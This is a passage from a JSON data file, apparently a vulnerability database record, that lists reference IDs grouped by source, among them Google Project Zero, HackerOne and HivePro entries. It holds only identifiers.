"68DCAE72-CB86-55B9-9CB6-653918238C2B", "68E78C64-D93A-5E8B-9DEA-4A8D826B474E", "697CC4E5-B8C5-57DA-8E6E-C44C37811757", "69FAE88E-7F22-5ACC-B555-3441BE00C566", "6A0A657E-8300-5312-99CE-E11F460B1DBF", "6A34D376-A589-5117-B34C-668A898CD6F2", "6A34D9C3-C290-5763-BAF4-F1D6351C4BA2", "6A4495E8-D723-5923-BB6A-B9EA838CF69B", "6AC0E68D-D6F7-55D9-A281-30D7E76D7556", "6BB53677-CE73-5D62-9443-E0D71E27C1C8", "6BC5CBC6-5A96-5743-8FB7-CEDDF527C52A", "6BCBA83C-4A4C-58D7-92E4-DF092DFEF267", "6C0C909F-3307-5755-97D2-0EBD17367154", "6CAA7558-723B-5286-9840-4DF4EB48E0AF", "6CC29A1A-24F4-5961-89F9-E7B824C6F37C", "6D33E1F2-A0E0-5F7C-B559-054EDA21AB58", "6D93189D-E2D8-5571-88D5-D778E1CB9C23", "6DA59A94-0CD1-5357-8F01-2BF3230F9017", "6E104766-2F7A-5A0A-A24B-61D9B52AD4EE", "6E42EC2D-B570-5376-884C-7C0566A1CA3D", "6E484197-456B-55DF-8D51-C2BB4925F45C", "6E4D24C6-CAF4-5CCB-83A7-844F830C86FC", "6F10C51B-BF15-522B-B1CB-BA95361D556E", "6F20D8B7-C252-5759-B02B-F8E2C9D42E38", "6F251270-3935-58F4-835C-C9D26FA97CD6", "6F7E4100-F6E7-5C57-8A1B-89F03DCC53A6", "6F93E170-75AD-5F5C-B7CC-6C4CEAA695AB", "700E9EFF-DFA6-504F-8DD1-FB1A62E01721", "70582B5B-E1E6-5767-94A6-39740A96A052", "70EDCB3B-9053-5056-980C-AC3123913F04", "71594B4E-D7FE-534F-8E37-71A1EE08E2E9", "71D52D12-0E56-5638-8E74-60EE2F8E569D", "71D962ED-2525-53CE-88D0-D8CD92FB0C02", "71E27C48-EAFE-5FC0-98A4-BE7276D47449", "7216751D-367F-5D68-BBFC-F5DF2584DEC5", "721C46F4-C390-5D23-B358-3D4B22959428", "7248BA4C-3FE5-5529-9E4C-C91E241E8AA0", "7275794A-F2F6-51E6-B514-185E494D8A3F", "72EF4B3F-6CF3-5E4D-9B05-D4E27A7A9D1A", "7395180E-85B1-5253-9975-F93BE4693139", "743571E7-B8EE-5E77-B047-E2E001379ACE", "749F952B-3ACF-56B2-809D-D66E756BE839", "74A4D09D-9483-5842-A44A-9DA17D085AF5", "75180259-16B4-5B60-9913-BFC9A306560A", "75876A50-BD9B-5991-9E42-7A343A97C890", "765DCAD5-2789-5451-BBFA-FAD691719F7A", "76A2C7A3-74C3-5ACA-9A55-3FB977E40B38", "76E7C0B8-1EE5-543A-A48E-E3AAEAA8BFF6", "76F0B9E8-D173-5309-9826-5880F8B35043", "76F6F494-8855-5F94-9675-4474FFFA65A1", "7758268F-2004-536A-B51F-62DA1E5A992D", "77912E98-768B-5AF5-AE06-1F42C6D88F72", "77A82210-BA24-58B5-8539-C0177DA9E1FB", "77BE16D3-FEC9-51E3-ADB4-250D5BE6CBD2", "780AD920-FF08-55C6-84C8-A8536C6F5527", "7865A97A-CD10-5E45-9429-CF5F72A6952B", "78787F63-0356-51EC-B32A-B9BD114431C3", "788F7DF8-01F3-5D13-9B3E-E4AA692153E6", "789B6112-E84C-566E-89A7-82CC108EFCD9", "78C2256A-8ABF-5E34-9268-2EEC0C09E567", "78CE8E59-092E-5214-9D02-A3F5F62F22E9", "7948E878-9BFE-5FEB-90AE-14C32290452F", "796BB1A4-EF64-57CA-862E-996A72F2FBE5", "798B7BE8-4F94-5D15-A93C-CFE73333BDC5", "798FA73D-8AE9-55E5-9D2F-4CC9D9477DD9", "799DA5B7-BCF7-56C7-80E8-EAF2351D78F1", "79FC7D55-7101-56EA-94E4-ABC94E423B3E", "7A3F31B5-D371-54B1-A81B-3863FBC71F0E", "7B2DA44B-D36F-56A4-B4D8-376B8D2F5586", "7B48A97D-242D-55E0-8A13-BD2727C1261F", "7B9BDDBA-81E8-5739-B3F7-419C0D6E2316", "7BB30379-8D57-5FD7-A90C-1A24B1846A23", "7BCC0C24-A1F7-531E-B1BA-342D21C9AF02", "7BE60530-0495-5366-846A-73B1A778DBDA", "7C40F14D-44E4-5155-95CF-40899776329C", "7C531491-7EB6-51AA-9072-F345BDB61AFD", "7C80631A-74CB-54F0-BC26-01EEF7D52760", "7D70E261-1C9F-517E-88BB-62776C7EE1F1", "7D82EDFA-5384-53C5-96AD-A99E88471129", "7D871BCD-8617-53E6-806A-ABD814B2E32F", "7F4F3321-8955-51B4-B195-7C1F647A6C84", "7F93036E-3036-56D2-97C5-CFAEAB8DB6F2", "7F937E02-A1B2-5F78-B140-90BC298729D4", "8021D807-3EDC-55A7-A9ED-A364159FADEE", "805E6B24-8DF9-51D8-8DF6-6658161F96EA", "817FB04E-AFFE-567B-8A2C-64C0A8923734", "81A94AF3-F3C2-5DAE-9C64-154CF9502B01", "81FEB23C-D090-5CE8-9B92-00BE597DE052", "82ABA9A8-11DC-5940-A195-1CF159D70E81", "83B145E2-F995-5B1C-863E-164839ED1173", "84917A44-9615-5FAA-A4D1-665234CD2CCF", "84D5F04A-0DDB-5788-8759-DA99D303B756", "85061E4D-4D82-56B5-94E7-5C1DBD5DD52B", "86360765-0B1A-5D73-A805-BAE8F1B5D16D", "865C5B8F-B074-5B0D-834A-E714EB00ADFC", "867C95E5-9596-5E6D-BC2F-FC7A610F3A3E", "8697646B-BC1C-5EEB-84C6-2F209E41B64E", "86CE8F3E-1859-58C8-97B5-8D53531EE22A", "8713FD59-264B-5FD7-8429-3251AB5AB3B8", "87378E23-9FC7-5BA6-BA12-83E90D9581DD", "88373793-9076-5F05-BDBB-635A7E1BD897", "88EB009A-EEFF-52B7-811D-A8A8C8DE8C81", "89732403-A14E-5A5D-B659-DD4830410847", "897BF6C2-DA98-58E0-941A-A3B16F7CCECD", "8A14FEAD-A401-5B54-84EB-2059841AD1DD", "8A57FAF6-FC91-52D1-84E0-4CBBAD3F9677", "8AADA11A-F9E6-5C81-9D9D-E1341F5DDDA2", "8ACDC1C6-CE43-5600-9F6F-644A7AD0DA2B", "8B324F0D-EA80-53B5-8ECF-EB5FC5C0EA13", "8CBB7F58-891D-5105-B269-029C59A9C3C9", "8D0CF3A6-EC3F-536C-A424-08879FF2F158", "8D604793-908D-5C35-A3EF-6D2688A10312", "8D6FB9A2-59E2-5565-A2C4-B00D9AE074CF", "8E16065C-63FB-554A-B463-A1E8582A334F", "8E1F0596-03B7-5FCC-8A29-3A8B45D02198", "8E284760-82AD-5C4C-BD1C-413114595833", "8E4650C7-9FBA-5055-83DD-004CFBA8A1D7", "8F0E3026-9DF1-5AA8-BECC-3F72A7A143C2", "8F15A064-7841-5899-84CE-8C298A269F83", "8F362564-1631-5AF9-BB38-D1BFC4678DAE", "8F450D89-6392-5E24-8649-ACA9D4C0D054", "8F6AEAF4-2161-55F7-96CB-003251BDC309", "8FB716EC-9A35-5F93-9759-B27A58B52CF8", "8FB9E7A8-9A5B-5D87-9A44-AE4A1A92213D", "91380AB1-864A-5C58-B9BE-88541D8E0911", "91C28663-6C3C-5E4F-B609-44E5804E4A83", "9227EA61-CA01-5E0A-AF8D-22B03C07A27A", "9267A549-88B1-5288-8C2B-C4BCAD621D57", "926942FE-1507-5B71-9266-0A5EDC38EE50", "9297A534-2B19-597A-8952-6EC15EE80BFF", "9304254B-557D-5DFE-AF8D-E21D0DF1FFDF", "931205E1-36E0-52BF-A978-D4C326F6A32A", "9326CB66-BADC-5643-B118-F38C39A9E34C", "9327CBCC-5FA0-5155-9C98-3F1488EF2F57", "93F2F758-FE27-5C30-9473-F26AD9210871", "945E86E8-E114-5F51-991C-13742C6EF49E", "9470FC0C-FB21-50C3-B4E9-5AB439EE325C", "94966928-86D4-5285-9A57-CBDD8F2EF438", "94A8FFF1-6A48-57CB-9340-D6806F47EFA0", "94DD467E-7BFF-5F8A-810C-3B1BDD195F6A", "94E003E0-82AE-5CFE-8818-DBA1610BDE3B", "95033F5C-FFFE-58C2-9799-C77E326ACD83", "952CB700-FA2F-5221-96B9-2656F967B63E", "958F00F1-C4FC-5213-82EA-290A530F859B", "97046A6F-8428-5DCF-88B4-4101351D637C", "977D06B3-F888-5FFF-8749-BF8AF7868ED6", "9790154B-5F28-5BD4-8541-6EAA8D3E2B36", "97D358EF-90F6-5D12-981B-DAFEB56F784F", "97F1C960-A343-5B1E-B261-4834CF80B790", "987C6FDB-3E70-5FF5-AB5B-D50065D27594", "988A0BAB-669A-57AE-B432-564B2E378252", "98F6C0C3-FC5E-5580-A148-55F2368B18C1", "9973FA3C-C964-5036-934F-A49BFE7BC4EE", "99A0AA73-B93D-56EF-930D-4FD64A4F4D35", "99C96AE6-0799-5308-B336-961D1EE8E2B4", "9A29EBA1-E786-5DD5-B661-E0080DEEB613", "9B0163DC-EE41-5E66-9AA8-A960262A2072", "9B4F4E4A-CFDF-5847-805F-C0BAE809DBD5", "9B660139-27C8-56B8-B9E2-8124D0E9F502", "9C3150AA-6C0C-5DC4-BEAD-C807FA5ACE12", "9CD2575C-CFA0-50A4-8AEC-4BE620162F81", "9CEA663C-6236-5F45-B207-A873B971F988", "9D511461-7D24-5402-8E2A-58364D6E758F", "9D8C431A-57F3-560C-8146-1232C2C029C2", "9DA6E85F-7AF2-5EE3-BF5C-A430C8DA3C4D", "9DAC062A-CFE4-5BB0-983A-8BAB512CF589", "9E16D977-AA24-57C3-9BD1-98296F3186F5", "9E4C737D-2D3C-5A43-B638-E131903225BC", "9E82678F-0559-56B2-94DC-6505FE64555C", "9EE3F7E3-70E6-503E-9929-67FE3F3735A2", "9F3ABA17-E33A-5018-9DCB-AECDD8DE9DEE", "9FE15986-BAC9-5740-8189-23E26F8399D5", "9FE4ADCA-7F2C-505F-AE74-C635FF2CDF75", "A065A4CD-AEE7-5474-82F9-77720A53CF23", "A085342C-7F7C-5CBA-A424-89E5B1046F48", "A160DC38-C6E4-5C85-9F98-4BC04D80FCD9", "A19F503A-900B-5929-8182-4BD7B1043185", "A1E14906-26B2-5DF8-95E3-07736CC5DDF2", "A1FEA8E3-60B5-5828-A65B-98AA56545D78", "A1FF76C0-CF98-5704-AEE4-DF6F1E434FA3", "A2D97DCC-04C2-5CB1-921F-709AA8D7FD9A", "A32F9E91-783B-5C20-9630-6A4E3DDA9AFF", "A39E4181-7C85-5B10-B0F9-AD286D09BD2A", "A3F15BCE-08AD-509D-AE63-9D3D8E402E0B", "A423A009-0EEA-569D-AFFE-89EC01F7CDF7", "A454A9CC-C18E-56A1-B166-1A0E244E0493", "A4DD8B03-CBED-5284-83EA-6C21FE0EA21C", "A4F047D6-CD61-5E9D-86EF-FB824CE2625F", "A4F881D3-85FA-580E-9465-AA77CE5B7390", "A57FBD78-A654-5CEE-8291-163C8AFB7210", "A5B4FB6B-123B-544F-A4E4-46B0595C1C72", "A6308120-6A99-5D2D-A1F7-6384AC37959C", "A6753173-D2DC-54CC-A5C4-0751E61F0343", "A8616E5E-04F8-56D8-ACB4-32FDF7F66EED", "A8BE443F-B43C-5460-9DBF-0E7C65078EF2", "A9A21055-01FA-5B3E-84B3-E294A9641418", "A9C7FB0F-65EC-5557-B6E8-6AFBBF8F140F", "AAD2737A-E98E-59B4-8310-3DF28159B7F4", "AB3BC859-0FB0-559F-A4C9-1BE9AEA13855", "AB5B35BD-2A55-5B27-A126-0CF1A7E7B145", "AB801839-51E0-5EFE-B00D-ABBB6391399A", "AB8EAC0D-269A-5799-885F-B0EA2A33792C", "ACB6C453-F1D5-5A65-91C2-DF455B997075", "ACE1EC69-37E6-58A5-8C0B-96212CDB38DF", "ADB28D0D-531E-5AED-99DF-2BD8B4589578", "AE0FE928-3464-53AA-BBD2-B3F9E871CEDD", "AEAB39A1-AAEB-53A6-836E-E4994CBDABF7", "AF45C6B5-246A-5363-8436-954018BD121C", "AF45D2D0-2D0E-5BD1-89DC-2E2C8E440A75", "AF93C0CA-BFDD-5C90-9D8D-55350790E1D1", "AF987350-FFD2-5814-AF7B-55862F1A8AFE", "B042A63E-E661-5B8E-9AA1-F0DEE4C18402", "B09C4EFC-2C66-5CA8-910F-E21D17B89608", "B139A751-2E67-52F2-B040-B17D8D6D33A0", "B16D26DB-D60C-5C0C-9452-80112720B442", "B1A370E0-71BC-5397-83F3-3344BCDCE170", "B20A08C3-E06C-57C9-998A-C38174AEA7DC", "B22E3A22-BF14-5660-977A-2D28D2AA2500", "B2FBA40E-C397-5DC8-8BF4-FA5BCB824172", "B31B0189-453E-5CA5-8FF3-5DC05043BE98", "B32ED3B3-2054-5776-B952-907BE2CBEED6", "B3557E68-AFF3-54C9-91A8-AFA2ABAA749C", "B38FDF75-522A-5254-9A3F-92C0D7B8CC99", "B417316F-A794-5234-BC9E-475C438FC35C", "B4483895-BA86-5CFB-84F3-7C06411B5175", "B47171B0-339A-582E-8AAC-3B18373664B7", "B4A4F7BE-BF43-5BB6-A4A7-A22C6B9DDCA5", "B53D7077-1A2B-5640-9581-0196F6138301", "B58E6202-6D04-5CB0-8529-59713C0E13B8", "B596B144-65DB-5863-8244-67AEE883C50E", "B5E7199E-37EE-5CBA-A8B7-83061DD63E3D", "B6182C52-78F5-58BC-8D3F-EF87D0239F0E", "B6987F3B-86A1-5FDC-AD92-EAF6D264C14A", "B8198D62-F9C8-5E03-A301-9A3580070B4C", "B81BC21D-818E-5B33-96D7-062C14102874", "B8347185-A0AD-5C98-B2DB-599D8BE5EF53", "B847AD89-69EB-53D0-9F76-3A94B2C9B65B", "B8D5B910-B397-520E-9526-FE32D86E93D8", "B9151905-5395-5622-B789-E16B88F30C71", "B946B2A1-2914-537A-BF26-94B48FC501B3", "B992B3E1-DF6B-5594-8A16-ED385E07A24C", "B9A69678-D96F-528D-B436-366259B4A283", "BA8F1657-CF64-574C-81BA-6432D5A351D4", "BAEE7CC9-E997-5B82-A169-AB56B635CC1D", "BB0C3D96-8DCF-5B10-A738-C0BC94E19AFD", "BBEEB41B-D67F-54B6-BA27-1956F83AAAC5", "BC027F41-02AD-5D71-A452-4DD62B0F1EE1", "BC6A00C7-AE9A-533B-87DE-DD27240A818C", "BD1B0180-DA8D-5255-B3FE-EB6CBC730206", "BD33CC4D-EC56-5A22-A712-1B23F8FB141D", "BDA05DEA-0BAD-5658-8E86-03A154FED355", "BE4B2B71-B588-5666-9A02-7855DBD45762", "BE5B3008-561B-5C3D-B8D1-BAA49FD49FA0", "BE66A9B6-104B-5F49-918A-8B913CE46473", "BE88205A-26D3-5EFE-B8CC-828EE7E33C86", "BEF7E47B-985F-56DE-AD21-DFEF507AAFE1", "BF930E9B-ED2F-52A3-87ED-2082926ED9B1", "BF9B0898-784E-5B5E-9505-430B58C1E6B8", "BFA4DC64-759A-5113-842C-923C98D12B44", "BFB49B3A-706B-5625-9899-54FCB1EE767B", "BFBBD550-B2CF-524B-87F6-D0A8980CDFD3", "BFE641BE-701F-5AE0-A891-975C96EFFAF6", "C0380E16-C468-5540-A427-7FE34E7CF36B", "C068A003-5258-51DC-A3C0-786638A1B69C", "C06AD447-C872-5647-832E-D9E87DF0561A", "C0A0F6D6-A203-5F8D-819A-40B5B23B0223", "C0A9F032-9822-59DC-94CC-20C15DEE0FED", "C0AE83D0-09A6-58EA-A244-1E453E699C04", "C14C47DA-F04C-56CC-955A-FF12A410D2F5", "C1878361-BBB3-5A2F-8212-945883518690", "C20BAC49-21F2-5BE4-B97B-2561BD95A1A8", "C26A395B-9695-59E4-908F-866A561936E9", "C306DCEF-59B3-5147-8169-3674490BD35F", "C3153E8C-0590-5D96-8EDC-AEE7E129246E", "C39D4BF6-5B98-5653-AA56-8DC5F53FEDA7", "C3AF7933-1DDE-58AB-BF32-75FEDB10C925", "C3C6029E-8A78-5C0B-9CF6-51489E455464", "C3DA2A71-DD68-5EF3-AC4C-5A10DECD333B", "C3E394AB-E22C-5A6A-B5AF-2A497DDAC7BA", "C45EBEA7-DE2F-5373-9AA5-334E20EA2D23", "C467EA51-59B6-5BEB-A634-62EFC2DC4419", "C5531AD4-9DFE-5A81-97D2-D34FD02E2AD6", "C58D4A9D-FE17-5F41-8B1B-800E327BB411", "C60B1B73-A009-5CE1-9D6C-3B66270812FD", "C640B511-D1E9-5F57-964D-3826F1C68DF8", "C68080B0-3163-5E76-AD65-2B454DBB95EE", "C6912636-2CB2-54CA-9F78-1A4FF04CA119", "C6C5DB3A-FC0D-58BE-B769-D097420B7716", "C72759ED-7C42-593C-A3C7-94E2CDB2B105", "C7617E51-4166-5517-879D-6385309E13D8", "C76F7089-967B-5A7F-B8DA-629452876A2A", "C7725591-3B9A-58D3-9191-5325187E1B5E", "C772DCBB-20D0-51DD-A580-F96689E65773", "C790841B-11B6-5497-B6DB-EF8A56DD8A0C", "C7EE8D86-B287-50F5-B8C2-05E11E510900", "C807D3D7-EF10-5C00-8252-C9F4B2A7F1F3", "C8799CA3-C88C-5B39-B291-2895BE0D9133", "C879EE66-6B75-5EC8-AA68-08693C6CCAD1", "C87EF7D4-0E85-54CD-9D5A-381C451E5511", "C8C50EDF-39F5-5103-AC79-A8C7FA6A4B60", "C8C7BBD4-C089-5DA7-8474-A5B2B7DC5E79", "C96865D9-B80D-5799-9EB6-DDF13650F0AA", "C9B0311C-F06D-5438-B36E-36DCE5FE691D", "C9E3963C-74AF-51D2-ACF7-7687E92D049F", "CA1AFE75-C90A-5C21-92B0-FC1C0282B767", "CA36C145-9220-5802-B024-452116AB9EAC", "CA408205-D32D-5A33-B1AF-0B863641C7FC", "CA625124-9F92-5FCF-83A7-3ECF5F0EBBFB", "CA7DF0EF-7032-54E3-B16E-D0845CE73845", "CA8D6F85-3A73-5070-B9A0-3A47FAE2C784", "CB9B5FAA-47CA-5D85-91B9-0AC5179D527B", "CBCB527D-3C29-5E5B-8C71-D7F20AB001D0", "CBEB0168-C1C9-5A9B-8B92-83E1054E44EA", "CC15AE65-B697-525A-AF4B-38B1501CAB49", "CC4175EB-3B91-5ABB-A700-84FC1105AAD5", "CC614155-FD7D-599B-B89C-006B26D76F48", "CD47935C-F8CB-535E-9535-E95B6AE9A0FC", "CD48BD40-E52A-5A8B-AE27-B57C358BB0EE", "CD8CABD7-BE65-5434-B682-F73ABA737C65", "CDD887D3-0536-588B-9CFC-6EF1E7FB9329", "CE2BB841-C742-5463-B5AB-BC69FA352CA1", "CE477D7E-7586-5C82-8DCC-033C48461E66", "CF47F8BF-37F7-5EF9-ABAB-E88ECF6B64FE", "CF96C0AC-16EB-57DE-B450-775CC256F1C2", "CF9EC818-A904-586C-9C19-3B4F04770FBD", "CFDC15EB-BE4F-5C86-B8B0-C542A791F67D", "D02E385B-76D7-5BDB-A49C-CE858BEB0009", "D0368327-F989-5557-A5C6-0D9ACDB4E72F", "D07D56B4-40BB-511F-B7EA-EF5B1544D876", "D0B02251-DCA3-58B6-B887-D339C4EAABF9", "D0E79214-C9E8-52BD-BC24-093970F5F34E", "D10426F3-DF82-5439-AC3E-6CA0A1365A09", "D107A97F-1C44-59AB-8FFE-803D1DC21EA3", "D133D476-887B-53A8-A831-16AFB83B7038", "D1E393B9-589D-5A20-8799-0F762FD361DA", "D21F1D28-2C44-5969-8F84-E5C6FF67DCFC", "D22CFFB0-30A6-5227-8048-C9C028070BD3", "D2602292-4969-564A-915E-2EFC6661FA35", "D298A3C8-E215-5549-B1A0-D01215070203", "D2CE9456-EDAA-59FB-AD0F-78E18BE9A0D0", "D2E3EB89-98A8-5009-AE95-7B79525D678E", "D4308421-E113-5104-8D37-4FB75AE2D7DC", "D4572C36-FAE8-5802-9B48-CF143220B909", "D4D3FB69-1A42-5FCE-BE50-5A025172F9CF", "D5003B3C-B1D9-5840-816F-1AFEBCAC7FD3", "D536CD4F-33F2-570F-BA34-54E141F1132C", "D64C04EA-093F-5924-A39B-714908D4637E", "D6AC5402-E5BA-5A55-B218-5D280FA9EA0D", "D6EE5F29-18C9-5E59-B9E2-01DC93F5ACE9", "D72095BC-06C5-50B2-8F66-EC86811783D3", "D745F7C4-87A0-56AB-9403-D0282C5A8C99", "D77DEF60-6E7D-5708-B9F2-DB4EA3E38C23", "D77EE79D-71A5-51BA-9A16-DC757F86CC50", "D7D65B87-E44D-559F-B05B-6AED7C8659D5", "D7D704DD-277E-5739-BD5E-3782370FCCB3", "D7E6498B-522A-5F6E-ADCF-45E60A0788D9", "D813949A-183D-55ED-AF64-B130B8F95A56", "D8246B9C-AC86-5FFA-AA8F-4419E4CD07F1", "D8AA4FFA-7BD1-5ACF-9344-B486A698509F", "D8BEFAC3-BA4E-5E7E-8553-B512E126AD53", "D93AD4F3-228E-5F05-A21F-9D852E25F569", "D959F04C-CDEC-5F39-9F51-BE3EC7B28341", "D97D0E5A-B60D-5B5B-93AC-3D6249E5A9C5", "D9F6E4B0-AC2C-5A70-B795-360757BE02D2", "DA01F84A-9B1D-5337-A465-2A9AB088C056", "DAB5D6B4-8A2D-58C0-835F-DA4F27B2142D", "DB81B174-C3E8-5B08-80E4-A6D768400C4A", "DBAD59E8-9E48-5D54-92A0-AAD5B57C39F6", "DBBD6963-3870-5117-A829-3DE976AE90E2", "DBF996C3-DC2A-5859-B767-6B2FC38F2185", "DC044D23-6D59-5326-AB78-94633F024A74", "DC2A0BD8-2ABF-5885-957D-0FA3B058665C", "DDAC4C84-E26E-5729-B325-4ED0A6FF550D", "DE558F67-26A7-5F03-AD15-C2087B81E69F", "DE88B6AE-5D54-5B49-A097-57038C720463", "DECBAC7B-9235-5E00-81C1-142CD41306FB", "DEE433F2-3A1C-513B-AE6B-E11EFFB5A8E4", "DF57E8F1-FE21-5EB9-8FC7-5F2EA267B09D", "DFB437A9-A514-588D-8B48-A6C7C75EAD32", "DFF2F784-9ED2-50EF-B79E-3EBF5A9B5428", "E0452D6A-51BC-51F5-9C1C-6CF01DA2805E", "E0A2EF02-5087-5522-ABA0-52F4142BB87B", "E1457E6C-87A3-5557-A3F2-175005D2A765", "E1ABFD41-98C8-576F-8509-5541B40FD442", "E255678E-F885-5F74-AA7A-7FA7230E3177", "E2690F56-34D9-5735-A733-8193CE2B6DBE", "E278D22E-7EC5-5A63-ADFC-EDEFDC650AA1", "E2C6B714-1F75-5584-B0B3-280C3B36C014", "E3BF7E8E-58EA-5BC5-A6F4-401912FFB4BE", "E3D6A7AD-AC9C-55EB-A993-B78D05403B54", "E4103A50-881C-52BB-86CC-27F549B798E9", "E4491698-477C-599A-A65D-EBA7441764E9", "E479356B-3D07-5131-8A34-4C6FD67776AB", "E4E73A91-5275-59C0-AB2A-7F3EE83DDE28", "E5280802-AB3D-5E96-83E0-97F22FB9EACA", "E59A01BE-8176-5F5E-BD32-D30B009CDBDA", "E59C9A70-6F3E-5CF6-9F15-B0039E0FBAF1", "E655806B-A2A8-5BCB-A30A-0120CA3E97A6", "E6B39247-8016-5007-B505-699F05FCA1B5", "E6E03693-50B8-5AB4-B766-8464A228BA02", "E796A40A-8A8E-59D1-93FB-78EF4D8B7FA6", "E7B177F6-FA62-52FE-A108-4B8FC8112B7F", "E7FB27A1-5ECC-5541-BE31-7ABC656DFACA", "E81474F6-6DDC-5FC2-828A-812A8815E3B4", "E981B35D-7356-5A5A-963A-744545A4E51C", "E9B21C59-ED98-5B3B-A993-F1C214F8796C", "E9DFB8EA-B99D-5022-ACE6-5A42D0D6A350", "E9FE319B-26BF-5A75-8C6A-8AE55D7E7615", "EA1AF0D9-1E6E-5080-BB7C-9D6035795FFB", "EA2EA382-C5B7-54EF-8547-EDDD15EA1B85", "EA3173CE-C426-5047-864A-480B1A30F235", "EA3C5D7E-0CC8-5AEC-8D7F-3C245A834DDA", "EA88FA45-8CE7-5D7D-8E6C-B04F8392F7EB", "EA906824-9149-507D-893C-87A7FED8998B", "EAFD9DBC-1E36-570B-9F48-8C355BBFD8E6", "EB648301-A198-5E4A-A72E-9639ED09F6C9", "EBF17036-7547-54B5-B0D6-B465FE6C9873", "EC0987E2-0001-5D63-A5AF-09675A5915BD", "EC35769F-2EAD-5464-8F97-D90F768E1E2D", "EC7A045E-54CB-5327-8755-53F82B91F56D", "EC9F685E-B0E6-5337-BBE2-2A7926315702", "ECD5D758-774C-5488-B782-C8996208B401", "ECFA4525-3876-5304-9821-FE532A103C20", "ED1C6DF0-94A0-58D6-B6F0-1034CE61DFCF", "EDDA4558-9527-5BDE-86E3-23DDD0BA5443", "EE01D764-5F14-5C0A-BD77-8E32854C5216", "EE2763B9-CDEA-5FAF-91CF-8B6902DD2E56", "EE4C8DE4-3366-58B0-9494-7FD5B6F9D0EF", "EF37F62F-1579-535A-9C3E-49B080F41CAC", "EFBD188C-B769-56F0-AEDB-F2809978A507", "EFD098FC-90C8-5665-98B7-79C96C6AEBAE", "F0CF90CD-DC6E-5F0F-AD61-5E1694700F32", "F13B1CEC-8713-5A1E-8117-F6BED15AEA04", "F1D342BE-E1E0-5B33-A19B-E2EB9E3E7C80", "F1E9BE6D-4024-56FB-80BB-B10ED5889144", "F208D311-79CA-5A2C-AE81-591BA4D30750", "F2165DE4-7724-559C-A733-DE9F244DA408", "F22160B4-2E80-5B7D-8238-95D7833F6D73", "F27B127B-57F0-5352-B92F-B6F921378CBB", "F2F2719B-7041-5D1A-A95A-7617360B1D08", "F32DF396-0485-5F43-8A52-31B8DD252790", "F37EDD30-724E-584E-9C9E-9B3E8C4C849C", "F388C84A-40DA-58BC-BE0A-74C7E1712C54", "F3A40027-6DB5-509C-81CF-473DE3BEF46E", "F3D43FE5-47AE-591C-A2DD-8F92BC12D9A8", "F3D87CA2-44D8-583C-AF7F-85AA53FB6CAD", "F41EE867-4E63-5259-9DF0-745881884D04", "F42BF447-C1A3-5795-8343-D71F096AFF52", "F463914D-1B20-54CA-BF87-EA28F3ADE2A3", "F493C59E-F2A7-52D1-B4B5-69CD3748C5E9", "F4C136DE-892B-5921-8475-E30BD548DDBB", "F50E9F2C-8C80-5A76-A993-A3E42414D797", "F523E799-3659-532F-8EED-40AD7F79E752", "F5339382-9321-5B96-934D-B803353CC9E3", "F594470D-2599-5B2E-B317-C9720581C07D", "F5B504D7-7C37-5BAB-94A5-1F1DA8384055", "F6A3D0A7-D380-5633-BFA5-3633EEBB6CDF", "F7396B72-9692-5E12-8893-FFE6A091B496", "F7994B92-2846-5644-8B68-EFB6DFB95ED2", "F893E602-F8EB-5D23-8ABF-920890DB23A3", "F8A7DE57-8F14-5B3C-A102-D546BDD8D2B8", "F8CD1EFD-78D9-5506-9555-5A12EFB752AB", "F99D82FC-3BE5-5B6D-8FDC-0E5BF9C0CE58", "FA2E2C3F-6F4C-5B17-ABFC-FC95FA17C474", "FB593988-2CFC-5828-8229-9274AC7B0F86", "FB60910B-FDAB-562A-8DF6-4E5DDE9F87B9", "FB65C479-F4E7-58BA-BC4A-AED04F10A11C", "FB83113C-AABD-5893-8DDE-332B57F4FDD4", "FC5EF359-9770-55B8-9E87-4F9044AE36F1", "FC802471-7CE1-5444-80E9-9DB49BA530DD", "FCAF01A0-F921-5DB1-BBC5-850EC2DC5C46", "FD364396-D660-5D23-8323-23248A5108C5", "FD4859A0-D69F-503C-BFDB-0C9025BDC68F", "FD65F47A-0B60-5F08-BFC2-1ABD16F49781", "FDF4BBB1-979C-5320-95EA-9EC7EB064D72", "FE8215CA-84E4-5CCD-84BD-119047B3CBEF", "FE8572DF-42D4-521C-B3DC-4715C2F9240D", "FEFA5AE8-5C94-5174-B44C-AC52B9AEAEAD", "FF2EF58E-53AA-5B60-9EA1-4B5C29647395", "FF4560D1-137A-5C41-90E4-E8EECAB04134", "FF610CB4-801A-5D1D-9AC9-ADFC287C8482", "FFE89CAE-FAA6-5E93-9994-B5F4D0EC2197"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:3B4F7E79DDCD0AFF3B9BB86429182DCA", "GOOGLEPROJECTZERO:CA925EE6A931620550EF819815B14156"]}, {"type": "hackerone", "idList": ["H1:1119224", "H1:1119228", "H1:1394916", "H1:1400238", "H1:1404731", "H1:1423496", "H1:1425474", "H1:1427589", "H1:1429014", "H1:1438393", "H1:1519841", "H1:1624137", "H1:591295", "H1:617543", "H1:671749", "H1:671857", "H1:678496", "H1:680480", "H1:695005"]}, {"type": "hivepro", "idList": ["HIVEPRO:0B8823CF2C319136EC74B1EBBD7D38BE", "HIVEPRO:0D02D133141B167E9F03F4AC4CA5579A", "HIVEPRO:0E3B824DCD3B82D06D8078A118E98B54", "HIVEPRO:205916945365E4C9EB9829951A82295A", "HIVEPRO:28A01D4CBC8A05BECFBA17B5AF4793F1", "HIVEPRO:310F7AA9457FF55D42E100B468844E6D", "HIVEPRO:3D8952D1ED1ADBF8196A73CD3B7344F2", "HIVEPRO:5339CBE01BD312A79B81CAAEE0F3B32E", "HIVEPRO:57EAE0D1FD9EA88C12142AFF641985C3", "HIVEPRO:62FBC3CC34B716CD71D68EC05F6AF2F5", "HIVEPRO:6B816A83F1272E907442906CCA28A809", "HIVEPRO:753BDE83C1D82672DBEDB937144E1598", "HIVEPRO:7E3F7EBD4701369D6F9E6149BFE03AC8", "HIVEPRO:7FC9DCD27C78F4BFA53C84B6CB04EC19", "HIVEPRO:8B19BED13F2445F04B8CD896B9AE4959", "HIVEPRO:8D92547900FABA151C6C4CFE3CF5B9A9", "HIVEPRO:92FF0246065B21E79C7D8C800F2DED76", "HIVEPRO:9E33ABD5EAFB3204848DAD28367798A9", "HIVEPRO:B25417250BE7F8A7BBB1186F85A865F9", "HIVEPRO:C037186E3B2166871D34825A7A6719EE", "HIVEPRO:D5E3F04B4C2C9644D7C5DCE9894CF0C6", "HIVEPRO:E7F36EC1E4DCF018F94ECD22747B7093", "HIVEPRO:E9C63D0D70D3232F21940B33FC205340"]}, {"type": 